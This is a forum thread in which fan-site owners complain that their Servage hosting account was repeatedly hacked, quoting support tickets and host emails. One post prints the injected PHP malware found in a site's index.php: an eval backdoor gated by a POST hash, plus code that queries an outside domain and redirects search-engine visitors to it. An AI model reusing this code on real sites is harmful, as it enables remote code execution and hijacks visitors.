Servage (http://www.servage.net) utterly completely sucks and I recommend anyone that needs a webhost to not use it ever, or if you do, switch immediately.

Their servers are utterly exploited by hackers who have no trouble getting into your Control Panel, changing your details and password, changing your FTP details, filling your pages with spam links, introducing security holes into your site, fill your site with crap that you can't even delete through FTP and overall just **** everything up.

Servage support will completely not help you at all, ignore all your evidence and pleas for help and repeatedly claim there is nothing wrong and you should just antivirus your computer.

worMatty's Servage account has been repeatedly tampered and fiddled with for the last months. Today they finally took the whole account out by flooding it with requests and taking it out for "bandwidth exceeded", so Dream17 (http://www.dream17.co.uk), Rooms (http://rooms.wurmz.net), Turnus (http://turnus.wurmz.net), Worms Evolved 2: The Descent of Worms (http://supsuper.wurmz.net/we/), etc. are all down for now.

Well, this is the last straw. We're moving it all to a new host. Hopefully anyone else in the same situation will do the same.

I know I will!

...Oh, wait.

Most webhosts are pretty crap. I like my current ones, though.

I've heard about these guys before.

There's a website called http://www.theweb****e.net/ (note, that's "The Web Sh1te" with the 1 being an i, but obviously the swear filter doesn't like it) that I was linked too a while back that are having a similar problem. If you can be bothered to correct the link, I advise you look at the page that's currently up. It's really funny.

Will do, Kieran.

Specifically:
The log in the CP shows access to it from IPs not my own, from countries like Canada and Spain.
New FTP accounts have been created with random alpha characters for usernames, with access to "/".
.html and .php files throughout the space have been edited to include links to commercial sites.
New folders with seemingly normal names like 'archive' and 'html' have been created containing index.php files made of dodgy-looking code. Dan says they're designed to allow someone to run code externally.
Dream17 seems to have been used to leech 409.55GB of data transfer in one day. This is far more than its usual reported 10GB. This is what has suspended the account, but the monthly limit is 5000GB so it should be up again soon. I think the 409 is the month so far.

Wait a minute... 409! It's all a big scam!

Google search Servage hacked.

Well that's pretty sucky.

I know this is the least of anyone's problems right now but here's thursday's turnus page (http://mr-phillby.deviantart.com/art/Turnus-page-57-106167776) since it went up late.

Rooms and Turnus sites are up again! :)

We're still switching servers though (not sure when, where to or any other details)

http://nearlyfreespeech.net is great if you don't get a ton of traffic

http://nearlyfreespeech.net is great if you don't get a ton of traffic

Yeah, I use them. No idea if they're a good deal for high-traffic sites, but they charge practically nothing for my level of usage and I trust them to leave my site up even if someone complains about it.

Most webhosts are ****. Exist was never much better, although I never got hacked they were incapable of sorting out the simplest of tasks. I gave up in the end and just set up my own server on my parents net connection (they only use it for site browsing anyway).
I use 123 for the domain names and no-ip for keeping it pointing at the right place and things rarely go wrong. At least when they do I can drive over and look at it myself.

A nice person on IRC hosts all my sites, and has agreed to host my 1.5 GB high-bandwidth Wii linux distro. I'd like to see any webhost doing that, not least for free! And it even has a pretty good URL!

[shameless advertising]hbcapps.com[/shameless advertising]

Unresolved Issues:
Date (GMT): Subject:
12-01-2009 12:33 Storage down [hide]
This issue affects Storage home58b.

Due to an unknown issue we do currently have some problems with the storage device that also stores your account data.
Due to this your account is currently offline.
We are working hard to resolve the issue as fast as possible.

An UNKNOWN ISSUE? You mean you DON'T KNOW what the problem is? I bet it's all those spam bots clogging up your pipes.

Basically...

wurmz.net
dream17.co.uk
SupSuper's site
Rooms/Turnus
Stef's stuff
Tram17

... all gone. Disappeared. Do not exist. You go to any of those domains and the server will say "Worms? What? Sorry, don't know what you mean. I run Apache if that's of any interest to you, though."

What happened to unique clustered storage to provide dependable availability?

An UNKNOWN ISSUE? You mean you DON'T KNOW what the problem is? I bet it's all those spam bots clogging up your pipes.

Basically...
wurmz.net
dream17.co.uk
SupSuper's site
Rooms/Turnus
Stef's stuff
Tram17

... all gone. Disappeared. Do not exist. You go to any of those domains and the server will say "Worms? What? Sorry, don't know what you mean. I run Apache if that's of any interest to you, though."

What happened to unique clustered storage to provide dependable availability?
Nice error message on D17 now

Fatal error: Cannot redeclare get_counter() (previously declared in /mounted-storage/home57b/sub004/sc36865-PIOI/dream17.co.uk/index.php:1) in /mounted-storage/home57b/sub004/sc36865-PIOI/dream17.co.uk/index.php on line 1

Hey boys and girls, wanna guess what sites have been hacked yet again even though the storage was supposedly "down"? (in fact Dream17 got hacked twice so the hack kinda killed itself)
12-01-2009 05:27:00
$a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://nasnezabanyat.biz/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}

On the bright side, it's back up ;)

Out of interest, how much space does Dream17 take up? I assume quite a bit because of all the CD32 images and stuff.

Twenty thousand gigabytes.

Whilst it's unfortunate that there've been problems, I'm glad to say my site has now been fixed up a little bit. It won't be any less prone to attacks but depending on what happens with Servage at least my site actually works now ;)

Unfortuntely I know nothing about hosting websites, so I am of no help.

Dear Matthew Hills,

This is Steffan from Servage Hosting again. I can see that you were
once a Servage customer therefore I would like to take this
opportunity give you a great new years offer!

For a limited time we offer a 30% discount to all users (also your friends!!)
using this coupon code when signing up: MEGA1212

This offer includes:
* 30% discount (the entire life of your account!)
* 510 GB Diskspace
* 5010 GB Transfer/month
* Free Domain!
* And all other features included in our normal package

More information regarding on the package:
http://www.servage.net/?coupon=MEGA1212

You can find all package details and ordering details at our site
www.servage.net. Please note that the discount will be first be
subtracted during the ordering process.

We hope that you will return to Servage Hosting today or know someone
who would like to take advantage of the great offer!
If you have any questions please contact sales@servage.net.

Did I mention that you are also welcome to give the coupon to
your friends? :)


Best regards,
Steffan, http://www.servage.net

lololololol

Wasn't me!

Thaaaaaaat's why Error has his on reseller account... so all my friends get hosted within my site.

Point for me. :cool:

Okay bumfaces. Here we have the support ticket history:

Hi, Servage.

A couple of the files stored on my hosting account have been modified to include malicious code that redirects people to a seemingly fake antivirus website.

On 03.07.2008 (July) @ 19:16, www/index.html was modified. I have renamed the modified file as _index.html.

On 17.07.2008 @ 23:59:00, dream17.co.uk/index.php was modified. I have a copy of this if you need it, and the associated .js file it also refers to, which was stored in the same directory.

Both of these modfifications seem to match up with what seem to be control panel accesses by an Estonian and Russian IP respectively, according to the Your Account > Account Security page. 81.5.166.60, 78.105.173.213 and Portugese addresses similar to 217.129.40.146 are me and my friend. The others I can not account for. How these people found my access details, I do not know. Needless to say I am changing passwords and checking settings.

I hope this is of some use to you, or sheds some light on any issues you may be experiencing, or even ones I am but without realising it! In any case, I thank you for your attention. I know there is nothing now that can be done. I'm baffled how they did this.

Thanks,

Matthew Hills

Hello Matthew,

We suggest you to kindly change your control panel and FTP passwords immediately so that no one will be able to access your account without your authorization.

Also kindly upload your files again on your account and replce them with the affected once. That should solve your issue.

Kind Regards
Adam, Support
Servage Hosting

Then later on...

Hi, again.

www/_index.html
www/_index_old.html
mattshill.me.uk/_index.html
tram17.com/_index.html

... have all been modified to point to function.js in the same directories. I have prefixed them all with an underscore to prevent them from being opened. I don't know where this file 'function.js' came from, but it seems to be something malicious. I don't know how someone was able to modify all the index files with the reference to this JavaScript file, as I changed my password since last time, have never typed it out but copied and pasted it, and have no malicious software reported on my machine. My only guess is that someone or something is modifying files through your system, or I have a dodgy script on my account, but I have no clue as to what that might be.

What I find strange is that only index files are modified, the .js files placed in the same dirs, and all of this done at approximately the same time, in each folder, as if done automatically by some program or script. Even the old index file that contains evidence from the last time this happened, _index_old.html, has been modified in the same manner! This further makes it look like something automatic, perhaps something looking for files with 'index' in their name.

Also, when I look at the account access log, I only see today's access, and the history has been cleared. I can't tell if someone was able to get in here. I would hope you have such logs.

Thanks for your help.

Matthew Hills

Hello Matthew,

Our admin has now investigated the issue further. From other customers we have heard about similar issue. It seem your computer has been infected by a virus. When connecting to your FTP account are the login details visible for a script that may change your index file.

We recommend you to install an anti-virus programm on your computer. We hope this will help to solve the issue.

Kind Regards
Scott, Support
Servage Hosting

Thanks for your help.

"When connecting to your FTP account are the login details visible for a script that may change your index file."

Sorry, was that a question?

I've scanned my computer but I've no evidence of viruses. Do you know which one in particular causes this, or can you recommend an anti-virus program that will identify and remove this threat? Is it possible that the problems are actually being caused by a vulnerability in an application I am using?

Thanks.

Matthew

Hello Matthew,

You can use AVG Free version. (http://free.avg.com/) It is a good antivirus and they have regular updates.

Kind Regards
John, Support
Servage Hosting

Thanks again for your response. Are you saying that AVG will identify the specific cause of this problem and remove it? I have used another virus scanner, but have had no results.

Hello Matthew,

Although it is a free software, it it pretty good. You can try installing and scanning your system with it. it generally detects all viruses.

Kind Regards
John, Support
Servage Hosting

Then later...

Hello.

I do not wish to renew my account on the next due date.

Thanks very much,

Matthew

Hello Matthew,

Thank you for submitting a ticket.

We are very sorry to hear that you want to cancel your Servage account. Kindly fill out the cancellation form at this direct URL in your admin panel:

https://secure.servage.net/admin/?menuHeader=3&menuSub=7&page=cancel

If we can do anything to convince you to stay, please don't hesitate to let us know. We will be happy to keep you as a Servage client.

Kind Regards
Victor, Support
Servage Hosting

Then later...

Hi, there.

Please can you delete my account or at least prevent anyone from accessing it again. I have disabled IP locking by accidentally clicking the link in a recent login failure notification email I received, and the Servage control panel does not allow me to reactivate this feature nor change my password.

Thanks very much.

Matthew

Hello Matthew,

I have checked and your account has already expired as on 2009-02-05.

Kind Regards
Adam, Support
Servage Hosting

Hi, Adam.

Indeed it has expired. But I can still log in to my account and am still receiving login failure notifications from it via email. Can you fix this for me? I don't need the account anymore.

Thanks,

Matthew

Hello Matthew,

You should not be able to login anymore as your account has expired, however we will take necessary actions regarding the same.

Kind Regards
Adam, Support
Servage Hosting

Keep watching.

Oh and...

Dear Matthew,

Someone has attempted to login to your account from 80.223.234.188 (Finland). We have denied the login attempt based on your country and/or IP based login limits specified in your control panel.

If you would like to disable the country and IP based login checks (e.g. if you can no longer access your account) please click the link below:

https://secure.servage.net/resetIPLock/?customer=36865&key=1bd5913e480b05cc59ecf59e7af50798


Best regards,
Your Servage Team, http://www.servage.net

This is an automated email. For questions or concerns kindly
open a support ticket via the control panel: http://cp.servage.net/

... was the email to me that caused the last ticket.

I just don't see why all this is in a private forum when it ought surely be plastered on a public website somewhere that Google can read.

Nahh, I can't do that. Where's my proof? All I'd be doing is *****ing, and where would I put it?

You could find the script that lets you get into Servage admin panels and email it to their customers.

You could find the script that lets you get into Servage admin panels and email it to their customers.

You could find the script that lets you get into Servage admin panels and email it to their customers.

You could find the script that lets you get into Servage admin panels and email it to their customers.

You could find the script that lets you get into Servage admin panels and email it to their customers.

You could find the script that lets you get into Servage admin panels and email it to their customers.

You could find the script that lets you get into Servage admin panels and email it to their customers.

You could find the script that lets you get into Servage admin panels and email it to their customers.

Holy smokes!

Hehehe, touché. :p

So much for emphasis. :)
No go and do what has been suggested, worMatty!

NO U.



Gay capitals-non-capitals script ****.

How does one get around that?

I g u e s s y o u c o u l d t y p e l i k e t h i s, b u t i t ' s a b i t r u b b i s h

EDIT: TheDevTeamThinkOfEverything

How does one get around that?
STICK ONE OF THE TEXT-BASED SMILIES IN :cool:

OR QUOTE SOMEONE :p

THAT'S IT!? :o

that's it!? :o

AND I WAS MODERATING SO WELL FOR A MINUTE THERE


:o

NO, JUST HAVE SOME LOWER-CASE TEXT somewhere.

Because that ^ is obviously a huge acronym, vB sez.

I thought the quote would do it but it didn't. Pah. I have better things to do that worry about how I can fool a website into letting me post in capitals.

YOU GUYS ARE A BUNCH OF DUMBASSES, HOPE THIS HELPS :cool: